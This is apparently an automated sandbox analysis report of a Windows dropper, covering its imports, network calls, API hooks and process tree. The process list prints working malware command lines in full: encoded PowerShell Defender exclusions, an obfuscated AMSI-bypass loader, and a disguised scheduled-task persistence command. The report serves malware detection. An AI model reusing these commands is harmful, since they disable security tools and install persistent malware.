                          ADVAPI32.dll | RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                          SHELL32.dll | SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                          ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                          COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
                          USER32.dll | GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                          GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                          KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                          Language of compilation system | Country where language is spoken | Map
                          English | United States |
                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                          Mar 27, 2022 01:40:58.721342087 CET | 49735 | 80 | 192.168.2.4 | 208.95.112.1
                          Mar 27, 2022 01:40:58.752830029 CET | 80 | 49735 | 208.95.112.1 | 192.168.2.4
                          Mar 27, 2022 01:40:58.752959013 CET | 49735 | 80 | 192.168.2.4 | 208.95.112.1
                          Mar 27, 2022 01:40:58.753820896 CET | 49735 | 80 | 192.168.2.4 | 208.95.112.1
                          Mar 27, 2022 01:40:58.785864115 CET | 80 | 49735 | 208.95.112.1 | 192.168.2.4
                          Mar 27, 2022 01:40:58.916342020 CET | 49735 | 80 | 192.168.2.4 | 208.95.112.1
                          Mar 27, 2022 01:42:02.109366894 CET | 80 | 49735 | 208.95.112.1 | 192.168.2.4
                          Mar 27, 2022 01:42:02.109472036 CET | 49735 | 80 | 192.168.2.4 | 208.95.112.1
                          Mar 27, 2022 01:42:24.943854094 CET | 80 | 49735 | 208.95.112.1 | 192.168.2.4
                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                          Mar 27, 2022 01:40:58.679579973 CET | 60647 | 53 | 192.168.2.4 | 8.8.8.8
                          Mar 27, 2022 01:40:58.696609020 CET | 53 | 60647 | 8.8.8.8 | 192.168.2.4
                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                          Mar 27, 2022 01:40:58.679579973 CET | 192.168.2.4 | 8.8.8.8 | 0xec82 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001)
                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                          Mar 27, 2022 01:40:58.696609020 CET | 8.8.8.8 | 192.168.2.4 | 0xec82 | No error (0) | ip-api.com |  | 208.95.112.1 | A (IP address) | IN (0x0001)
                          • ip-api.com
                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                          0 | 192.168.2.4 | 49735 | 208.95.112.1 | 80 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                          Timestamp | kBytes transferred | Direction | Data
                          Mar 27, 2022 01:40:58.753820896 CET | 827 | OUT | GET /line/?fields=hosting HTTP/1.1
                          Host: ip-api.com
                          Connection: Keep-Alive
                          Mar 27, 2022 01:40:58.785864115 CET | 827 | IN | HTTP/1.1 200 OK
                          Date: Sun, 27 Mar 2022 00:40:57 GMT
                          Content-Type: text/plain; charset=utf-8
                          Content-Length: 5
                          Access-Control-Allow-Origin: *
                          X-Ttl: 60
                          X-Rl: 44
                          Data Raw: 74 72 75 65 0a
                          Data Ascii: true


                          Code Manipulations

                          Function Name | Hook Type | Active in Processes
                          ZwEnumerateKey | INLINE | explorer.exe, winlogon.exe
                          NtQuerySystemInformation | INLINE | explorer.exe, winlogon.exe
                          ZwResumeThread | INLINE | explorer.exe, winlogon.exe
                          NtDeviceIoControlFile | INLINE | explorer.exe, winlogon.exe
                          ZwDeviceIoControlFile | INLINE | explorer.exe, winlogon.exe
                          NtEnumerateKey | INLINE | explorer.exe, winlogon.exe
                          NtQueryDirectoryFile | INLINE | explorer.exe, winlogon.exe
                          ZwEnumerateValueKey | INLINE | explorer.exe, winlogon.exe
                          ZwQuerySystemInformation | INLINE | explorer.exe, winlogon.exe
                          NtResumeThread | INLINE | explorer.exe, winlogon.exe
                          RtlGetNativeSystemInformation | INLINE | explorer.exe, winlogon.exe
                          NtQueryDirectoryFileEx | INLINE | explorer.exe, winlogon.exe
                          NtEnumerateValueKey | INLINE | explorer.exe, winlogon.exe
                          ZwQueryDirectoryFileEx | INLINE | explorer.exe, winlogon.exe
                          ZwQueryDirectoryFile | INLINE | explorer.exe, winlogon.exe
                          Function Name | Hook Type | New Data
                          ZwEnumerateKey | INLINE | 0xE9 0x93 0x33 0x35 0x5D 0xDF
                          NtQuerySystemInformation | INLINE | 0xE9 0x93 0x33 0x35 0x5B 0xBF
                          ZwResumeThread | INLINE | 0xE9 0x91 0x13 0x35 0x58 0x8F
                          NtDeviceIoControlFile | INLINE | 0xE9 0x97 0x73 0x36 0x64 0x4F
                          ZwDeviceIoControlFile | INLINE | 0xE9 0x97 0x73 0x36 0x64 0x4F
                          NtEnumerateKey | INLINE | 0xE9 0x93 0x33 0x35 0x5D 0xDF
                          NtQueryDirectoryFile | INLINE | 0xE9 0x91 0x13 0x35 0x5C 0xCF
                          ZwEnumerateValueKey | INLINE | 0xE9 0x97 0x73 0x36 0x61 0x1F
                          ZwQuerySystemInformation | INLINE | 0xE9 0x93 0x33 0x35 0x5B 0xBF
                          NtResumeThread | INLINE | 0xE9 0x91 0x13 0x35 0x58 0x8F
                          RtlGetNativeSystemInformation | INLINE | 0xE9 0x93 0x33 0x35 0x5B 0xBF
                          NtQueryDirectoryFileEx | INLINE | 0xE9 0x9E 0xE3 0x33 0x3B 0xBF
                          NtEnumerateValueKey | INLINE | 0xE9 0x97 0x73 0x36 0x61 0x1F
                          ZwQueryDirectoryFileEx | INLINE | 0xE9 0x9E 0xE3 0x33 0x3B 0xBF
                          ZwQueryDirectoryFile | INLINE | 0xE9 0x91 0x13 0x35 0x5C 0xCF
                          Function Name | Hook Type | New Data
                          ZwEnumerateKey | INLINE | 0xE9 0x93 0x33 0x35 0x5D 0xDF
                          NtQuerySystemInformation | INLINE | 0xE9 0x93 0x33 0x35 0x5B 0xBF
                          ZwResumeThread | INLINE | 0xE9 0x91 0x13 0x35 0x58 0x8F
                          NtDeviceIoControlFile | INLINE | 0xE9 0x97 0x73 0x36 0x64 0x4F
                          ZwDeviceIoControlFile | INLINE | 0xE9 0x97 0x73 0x36 0x64 0x4F
                          NtEnumerateKey | INLINE | 0xE9 0x93 0x33 0x35 0x5D 0xDF
                          NtQueryDirectoryFile | INLINE | 0xE9 0x91 0x13 0x35 0x5C 0xCF
                          ZwEnumerateValueKey | INLINE | 0xE9 0x97 0x73 0x36 0x61 0x1F
                          ZwQuerySystemInformation | INLINE | 0xE9 0x93 0x33 0x35 0x5B 0xBF
                          NtResumeThread | INLINE | 0xE9 0x91 0x13 0x35 0x58 0x8F
                          RtlGetNativeSystemInformation | INLINE | 0xE9 0x93 0x33 0x35 0x5B 0xBF
                          NtQueryDirectoryFileEx | INLINE | 0xE9 0x9E 0xE3 0x33 0x3B 0xBF
                          NtEnumerateValueKey | INLINE | 0xE9 0x97 0x73 0x36 0x61 0x1F
                          ZwQueryDirectoryFileEx | INLINE | 0xE9 0x9E 0xE3 0x33 0x3B 0xBF
                          ZwQueryDirectoryFile | INLINE | 0xE9 0x91 0x13 0x35 0x5C 0xCF


                          Target ID:1
                          Start time:01:40:46
                          Start date:27/03/2022
                          Path:C:\Users\user\Desktop\Install.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\Install.exe"
                          Imagebase:0x400000
                          File size:4713759 bytes
                          MD5 hash:280BFD5EA1F41586EA0EF60EE44BC8DB
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low

                          Target ID:2
                          Start time:01:40:47
                          Start date:27/03/2022
                          Path:C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe
                          Imagebase:0x400000
                          File size:5028144 bytes
                          MD5 hash:D55DC38B4EE6BED2168E74194533C572
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Antivirus matches:
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 50%, Virustotal
                          Reputation:low

                          Target ID:3
                          Start time:01:40:48
                          Start date:27/03/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff647620000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Target ID:4
                          Start time:01:40:48
                          Start date:27/03/2022
                          Path:C:\Users\user\AppData\Roaming\34432.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Users\user\AppData\Roaming\34432.exe
                          Imagebase:0x770000
                          File size:2366976 bytes
                          MD5 hash:04F6704BD3AB97905A497BAF3D7FDB3C
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Yara matches:
                          • Rule: SUSP_NET_NAME_ConfuserEx, Description: Detects ConfuserEx packed file, Source: C:\Users\user\AppData\Roaming\34432.exe, Author: Arnim Rupp
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 35%, Virustotal
                          • Detection: 77%, ReversingLabs
                          Reputation:low

                          Target ID:5
                          Start time:01:40:49
                          Start date:27/03/2022
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                          Imagebase:0xbe0000
                          File size:98912 bytes
                          MD5 hash:6807F903AC06FF7E1670181378690B22
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Reputation:high

                          Target ID:6
                          Start time:01:40:58
                          Start date:27/03/2022
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
                          Imagebase:0x7ff7bb450000
                          File size:273920 bytes
                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Target ID:7
                          Start time:01:40:59
                          Start date:27/03/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff647620000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Target ID:8
                          Start time:01:40:59
                          Start date:27/03/2022
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
                          Imagebase:0x7ff6ba650000
                          File size:447488 bytes
                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Reputation:high

                          Target ID:20
                          Start time:01:41:27
                          Start date:27/03/2022
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
                          Imagebase:0x7ff6ba650000
                          File size:447488 bytes
                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Reputation:high

                          Target ID:22
                          Start time:01:41:36
                          Start date:27/03/2022
                          Path:C:\Windows\System32\nslookup.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\nslookup.exe
                          Imagebase:0x7ff6e2e30000
                          File size:86528 bytes
                          MD5 hash:AF1787F1DBE0053D74FC687E7233F8CE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate

                          Target ID:23
                          Start time:01:41:41
                          Start date:27/03/2022
                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$qKHXRLjxcQb.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');$qKHXRLjxcQb.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$NibVxWxTFc,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');Write-Output $qKHXRLjxcQb.CreateType();}$uYKrZWxknTiUv=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$SpNyfScDlNPPHB=$uYKrZWxknTiUv.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RRmRtbQVOsCwqbtFCRP=oBYZxpoBuJDg @([String])([IntPtr]);$CSrLsWTvUKtnfJeCoYnQHQ=oBYZxpoBuJDg 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LbwxtlPJWDL=$uYKrZWxknTiUv.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$UsbtvKZkuSsHuw=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Load'+'LibraryA')));$GBWVSxTZRtiWMYLEL=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Vir'+'tual'+'Pro'+'tect')));$zcmbglj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UsbtvKZkuSsHuw,$RRmRtbQVOsCwqbtFCRP).Invoke('a'+'m'+'si.dll');$NtWqUAjxRFzIehWzj=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$zcmbglj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$QZnCEHiAlz=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,4,[ref]$QZnCEHiAlz);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$NtWqUAjxRFzIehWzj,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,0x20,[ref]$QZnCEHiAlz);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
                          Imagebase:0xdd0000
                          File size:430592 bytes
                          MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Reputation:high

                          Target ID:24
                          Start time:01:41:41
                          Start date:27/03/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff647620000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Target ID:25
                          Start time:01:41:42
                          Start date:27/03/2022
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$JkETjFsAcrF.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');$JkETjFsAcrF.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$jXrdWylJno,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');Write-Output $JkETjFsAcrF.CreateType();}$lPmVEIqLxWSBJ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$oknnqNPEawtCof=$lPmVEIqLxWSBJ.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PfTqTVeTqNbzEtTZAwA=JcVEStQtPhkP @([String])([IntPtr]);$FBhryrsEcCEQMAYVVFmrjj=JcVEStQtPhkP 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$gdWNaSIjpXI=$lPmVEIqLxWSBJ.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$MwCkRVFOfjwTFV=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Load'+'LibraryA')));$PwfBMMcphOddVTLUY=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Vir'+'tual'+'Pro'+'tect')));$FyAgKxj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MwCkRVFOfjwTFV,$PfTqTVeTqNbzEtTZAwA).Invoke('a'+'m'+'si.dll');$GiLFGjttEZsjytHxc=$oknnqNPEawtCof.Invoke($Null,@([Object]$FyAgKxj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$XarcXAurwd=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,4,[ref]$XarcXAurwd);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$GiLFGjttEZsjytHxc,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,0x20,[ref]$XarcXAurwd);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
                          Imagebase:0x7ff6ba650000
                          File size:447488 bytes
                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Reputation:high

                          Target ID:26
                          Start time:01:41:42
                          Start date:27/03/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff647620000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Target ID:27
                          Start time:01:41:45
                          Start date:27/03/2022
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe
                          Imagebase:0x7ff7bb450000
                          File size:273920 bytes
                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:28
                          Start time:01:41:46
                          Start date:27/03/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff647620000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:29
                          Start time:01:41:46
                          Start date:27/03/2022
                          Path:C:\Windows\System32\schtasks.exe
                          Wow64 process (32bit):false
                          Commandline:schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe"
                          Imagebase:0x7ff71aea0000
                          File size:226816 bytes
                          MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:30
                          Start time:01:41:47
                          Start date:27/03/2022
                          Path:C:\Users\user\AppData\Roaming\Chrome\chrome.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Users\user\AppData\Roaming\Chrome\chrome.exe
                          Imagebase:0x20000
                          File size:2366976 bytes
                          MD5 hash:04F6704BD3AB97905A497BAF3D7FDB3C
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Yara matches:
                          • Rule: SUSP_NET_NAME_ConfuserEx, Description: Detects ConfuserEx packed file, Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe, Author: Arnim Rupp
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 77%, ReversingLabs

                          Target ID:31
                          Start time:01:41:48
                          Start date:27/03/2022
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd" cmd /c "C:\Users\user\AppData\Roaming\Chrome\chrome.exe
                          Imagebase:0x7ff7fc480000
                          File size:273920 bytes
                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:32
                          Start time:01:41:49
                          Start date:27/03/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff647620000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:33
                          Start time:01:41:50
                          Start date:27/03/2022
                          Path:C:\Users\user\AppData\Roaming\Chrome\chrome.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Users\user\AppData\Roaming\Chrome\chrome.exe
                          Imagebase:0xfa0000
                          File size:2366976 bytes
                          MD5 hash:04F6704BD3AB97905A497BAF3D7FDB3C
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET

                          Target ID:36
                          Start time:01:42:09
                          Start date:27/03/2022
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
                          Imagebase:0x7ff7bb450000
                          File size:273920 bytes
                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:37
                          Start time:01:42:10
                          Start date:27/03/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7748d0000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:38
                          Start time:01:42:11
                          Start date:27/03/2022
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
